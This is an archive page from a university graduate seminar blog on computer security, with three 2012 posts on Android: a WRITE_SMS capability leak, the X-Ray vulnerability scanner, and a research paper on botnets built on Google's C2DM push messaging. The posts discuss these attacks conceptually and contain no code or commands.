Rice University logo
 
Top blue bar image
A graduate seminar: current topics in computer security
 

Archive for the ‘Android’ Category


More confused deputies

November 7th, 2012 by bss4

I started following blogs listed on the course blog’s information security links of which this Russian blog is a part. The blog reported on a recently discovered capability leak on several Android phones by a group of researchers at NC State University. Let’s look into the issue in a little more detail.

Capability leak

Let’s start by defining a capability leak. Think of capabilities as Android permissions. Now let’s say system app A (e.g., Android’s messaging app) acts as a deputy to third-party apps wanting to send SMSs via app A i.e., while a third-party app B can request app A to send a particular SMS message to an outbound number, it does not have the authority to do so by itself. Since sending SMS is a security critical functionality, one would expect app A to check if app B has the required SEND_SMS permission before it acts on app B’s behalf. If app A does do the required check, it guards its privilege (capability) of sending an SMS. Otherwise, there is a privilege (capability) leak allowing virtually any app without the requisite permissions to send SMSs via app A.

The attack

A description of the attack itself is linked earlier in this article. To summarise, it has been found that the WRITE_SMS permission (call it capability) is being leaked. In the extreme case, this means that an app without WRITE_SMS permission (or no requested permissions at all) could write a fake SMS via the system messaging app. Not surprisingly, this could be used for phishing end-users; it seems fashionable to call it “Smishing”, short for SMS Phishing.

While such a leak is not new (the first description of the problem dates back to Hardy’s article published in the year 1988), the fact that something seemingly evident such as the WRITE_SMS permission leak has not been brought to notice before is alarming. More so, the attack is claimed to be deployable on the latest and greatest version of Android OS (and prior versions as well) and across phones from multiple OEMs.

More to come?

Researchers who discovered the leak have published a paper earlier this year about the framework they built to automatically discover capability leaks in the Android source code (AOSP). Although this particular leak finds no mention in the paper, it seems as though the leak was found in the process of experimenting with their framework (Woodpecker) and probing for more leaks. It shouldn’t be surprising if more leaks are uncovered.

Having said that the framework built by the researchers has several limitations: (1) It does not consider capability leaks in C code; Android has a significant native code base, (2) It does not consider the case where multiple malicious applications can collude to achieve the same end-result as that of capability leaks, and (3) It only scans for leaks of 13 out of more than 200 default Android permissions and only in those cases where the originator of the leak is a pre-loaded app (apps in the stock image); it is realistic for third-party apps to be doing the same thing.

X-Ray for Android

October 17th, 2012 by bss4

X-Ray is an Android app developed by Duo Security (http://www.duosecurity.com/) that scans your device for vulnerabilities that could be potentially exploited. It focuses on privilege escalation vulnerabilities: the sorts that would make the attacker root.

App scanning vs. system scanning:

X-Ray does not scan apps, it scans the device’s firmware (or ROM) comprising, among other things,  the underlying kernel, third-party native libraries and any system binaries.


Source: http://www.arm.com/images/androidStack.jpg

In Android’s software stack (see picture), this means the linux kernel, certain library components e.g., WebKit, libc among other things. System binaries that are utilitarian in nature e.g., logcat, adb are also part of the ROM that X-Ray app scans.

As one can see, it is clear that X-Ray chooses a different layer of the software stack altogether to scan for vulnerabilities. Mobile anti-virus apps rely on scanning applications per se while X-Ray scans the underlying system software whose vulnerabilities the malicious apps exploit. The argument put forward by the authors of X-Ray is that fingerprinting malicious apps can get out of hand considering the fact that slightly different variants of known malware are engineered on a regular basis and catching up with this not only requires time and effort but does not do a good job: malware that has not been fingerprinted yet can evade anti-virus checks. Note that there are a large number of app developers whose code needs to be fingerprinted and on a platform like Android, the inertia for becoming a developer being low, anyone/everyone could be an app developer.

Accountability:

On the other hand, system software (kernel, open-source libraries etc.) operate in a more controlled environment: people who maintain these things are fewer in number albeit distributed. For instance, issues in Android’s linux kernel ought to be tracked by Google, OEM’s like Samsung and/or Carriers such as T-Mobile; open-source libraries are maintained by known entities whose responsibility it is to track and resolve known (security) bugs. This means that, unless a vulnerability is solely at the application layer, one could attribute a given security bug to a known entity where the bug exists. From then on, it’s the entity’s responsibility to fix this bug and not let malware writers exploit it. In contrast, classical anti-virus solutions only tell the end-user if an app is malicious or not; the blame is solely on the app developer. The end-user does not have the knowledge of where the fault for the malware lies: Is the malware writer (app developer) doing something nasty on my phone or is he/she simply exploiting a known fault in the system software?

X-Ray scans the system software and (with user’s consent) collect information on what vulnerabilities persist on a phone’s ROM. Assuming the app becomes popular with the users and many install them and consent to the app collecting security related information, it would be interesting to see if and how the blame is shared among different entities. For instance, to what extent is Carrier X to blame for not shipping a security patch for a known bug? This, in turn, could motivate a collective petition on the users’ part seeking immediate remediation from the entity who is to blame. The authors of X-Ray concede that the incentives for a given entity to expend effort pushing a patch are skewed: let’s say a device A from carrier X has a known unpatched vulnerability; while X gets to work on updating all device A’s, a new device running the latest ROM (patching the known vulnerability) is out and users have started upgrading to this new device, perhaps more due to wanting a newer phone that wanting a more secure phone. How does this incentivise X? Questions like these require a more broader study on the cost-benefit aspects of patching and patch deployment.

Conclusion:

Personally, I feel X-Ray is a step in the right direction. From their website, I gather that they have some preliminary dataset from about 20,000 Android devices that have installed their app, and they have found that over half of these have unpatched vulnerabilities. For those interested, one of the main chaps behind the app, Jon Oberheide, has an upcoming webinar next week. See http://info.duosecurity.com/webinar-mobile-vulnerabilities

On the security implications of C2DM

September 29th, 2012 by bss4

When I read about Google’s Android Cloud to Device Messaging (C2DM) framework—its successor is named Google Cloud Messaging (GCM) for Android [1] —back when it was introduced, I thought it was a security faux pas on Google’s part. In short, the GCM framework allows Android app developers to register with Google’s push notification service which allows the former to send short messages to end-user devices on which the former’s app has been installed. The message is sent from the app developer’s (remote) server via Google’s servers to the device. Conforming to Google’s open policy, there is no vetting: any app developer can choose to use GCM as long as he/she declares the relevant permissions in the manifest and the end-user approves the same during application install process. To make matters worse, attackers could simply repackage a good app, embed it with a C2DM-based channel and use the latter maliciously. In our first class presentation on [4], Lee and I spoke of how prevalent repackaging and its subsequent deployment on third-party app markets is, in the malware writers community: The study found that 86% of malicious apps found in third-party Android markets are repackaged.

With a hunch that I was right, I searched Google for “exploiting c2dm” and the first result was a paper titled “Cloud-Based Push Styled Mobile Botnets…” [2]; why not? The paper has been selected for this year’s Annual Computer Security Applications Conference (ACSAC). But first, a bit about C2DM…

C2DM

An app developer, say Charlie, signs up with C2DM by providing a username, password and the package name for his application. The following protocol ensues:

a) Charlie’s application, say its called BotMeister, registers itself with a C2DM server providing Charlie’s C2DM username and the device ID of the phone on which it is installed. Note that a device ID uniquely identifies a phone. Also, this step presupposes that BotMeister has been installed by the user who has consented to the app’s C2DM specific Android permissions [1].

b) The C2DM server provides a unique registration ID to BotMeister which identifies the device it is running on. (Are you thinking why they don’t reuse device ID?)

c) BotMeister sends the registration ID in (b) along with its C2DM username (same as Charlie’s C2DM username) to Charlie’s server. Google obviously doesn’t want Charlie’s server to know end-user’s device IDs. No wonder C2DM server generates a new Unique ID for the device.

d) Charlie authenticates to a C2DM server with his credentials after which he is handed an auth token by the server; subsequently, Charlie packages the auth token, his message and the registration ID in (b) and sends it back to the C2DM server to be relayed to a device where BotMeister is installed. Note that, Charlie can only send a message to one device at a time. GCM, however, allows multicast messages.

e) Finally, the C2DM server forwards the message to the device ID that maps to the registration ID contained in the message. If a C2DM connection is not active on the recipient,  it stores the message and sends the message when the device eventually establishes a connection.

Given the basic protocol of C2DM, it is not hard to conceive of a botnet framework built on top of it. Charlie’s BotMeister can do bad things on devices it is installed on by using information contained in a C2DM message. Firstly, the message could be a malicious payload that escalates privileges on the device; secondly, C2DM could simply be used to create and subsequently remote control bots (Charlie’s victims) from Charlie’s Control and Command (C&C) server. The paper talks of the latter. Now, a bit about the paper.

C2DM Botnet

The botnet functionality itself isn’t interesting; the authors of the paper build a botnet by the book e.g., collect user info. What is  interesting is that their framework strives to be as stealthy as possible to evade detection. Also, they attempt to make their bot design both scalable and fault tolerance.  It is stealthy in the following way: The framework cleverly modifies step (c) in the C2DM handshake protocol (preceding section) by making BotMeister communicate to Charlie’s server via a C2DM server. The idea is that, a defense to the proposed attack might inspect URLs to which BotMeister is communicating. By relaying the reply via C2DM, the recipient as seen by the device is a C2DM server, not Charlie’s.

Scalability is necessary in C2DM because, one is allowed to send at most 200,000 messages per day. GCM, however, does not have a daily quota: more the merrier. Scalability is addressed by proposing a variant of the C2DM handshake protocol where Charlie has registered with multiple usernames and uses each to create a subnet of bots.

Fault tolerance is necessary because, Google could deregister a C2DM username that is seen to be doing bad things. The scalability solution helps tolerate disruptions to a certain extent, since Charlie could use alternate usernames that have not yet been banned. Also, it is possible for Charlie to have alternate C&C servers as back up, making detection of malice more difficult.

 Prototype

The authors’ prototype is a neat example of a real-world botnet framework using C2DM. Apart from the things mentioned above, the authors present an evaluation of the prototype that shows that not only does their framework utilise resources optimally (small network bandwidth, power consumption) but also makes application of classic anomaly based intrusion detection techniques difficult because of seemingly small differences in resource usage between a normal and an infected device. For more, read the paper 🙂

Summary

C2DM/GCM for Android introduces a new attack vector in the Android ecosystem. The discussed paper provides a real-world prototype of a botnet framework based on it. Conceptually , C2DM/GCM bloats up the already unmanageable Trusted Computing Base [3] (comprising of Linux kernel and Android middleware) of Android by adding remote entities to it that engender no trust at all. Consequently, even if Google hardens their operating system, attackers can control the device remotely.

Also, Google is not the only platform that offers such a push notification service to developers. Apple, Microsoft, Blackberry and Symbian all have similar push notification frameworks that beg to be examined more closely.

References:

[1] Google Cloud Messaging for Android: http://developer.android.com/guide/google/gcm/index.html

[2] “Cloud-Based Push-Styled Mobile Botnets: A Case Study of Exploiting the Cloud to Device Messaging Service”, S. Zhao et. al., http://www.cse.cuhk.edu.hk/~pclee/www/pubs/acsac12.pdf

[3] Trusted Computing Base: Wikipedia, http://en.wikipedia.org/wiki/Trusted_computing_base

[4] “Dissecting Android Malware: Characterization and Evolution”, Y. Zhou et. al., http://www.csc.ncsu.edu/faculty/jiang/pubs/OAKLAND12.pdf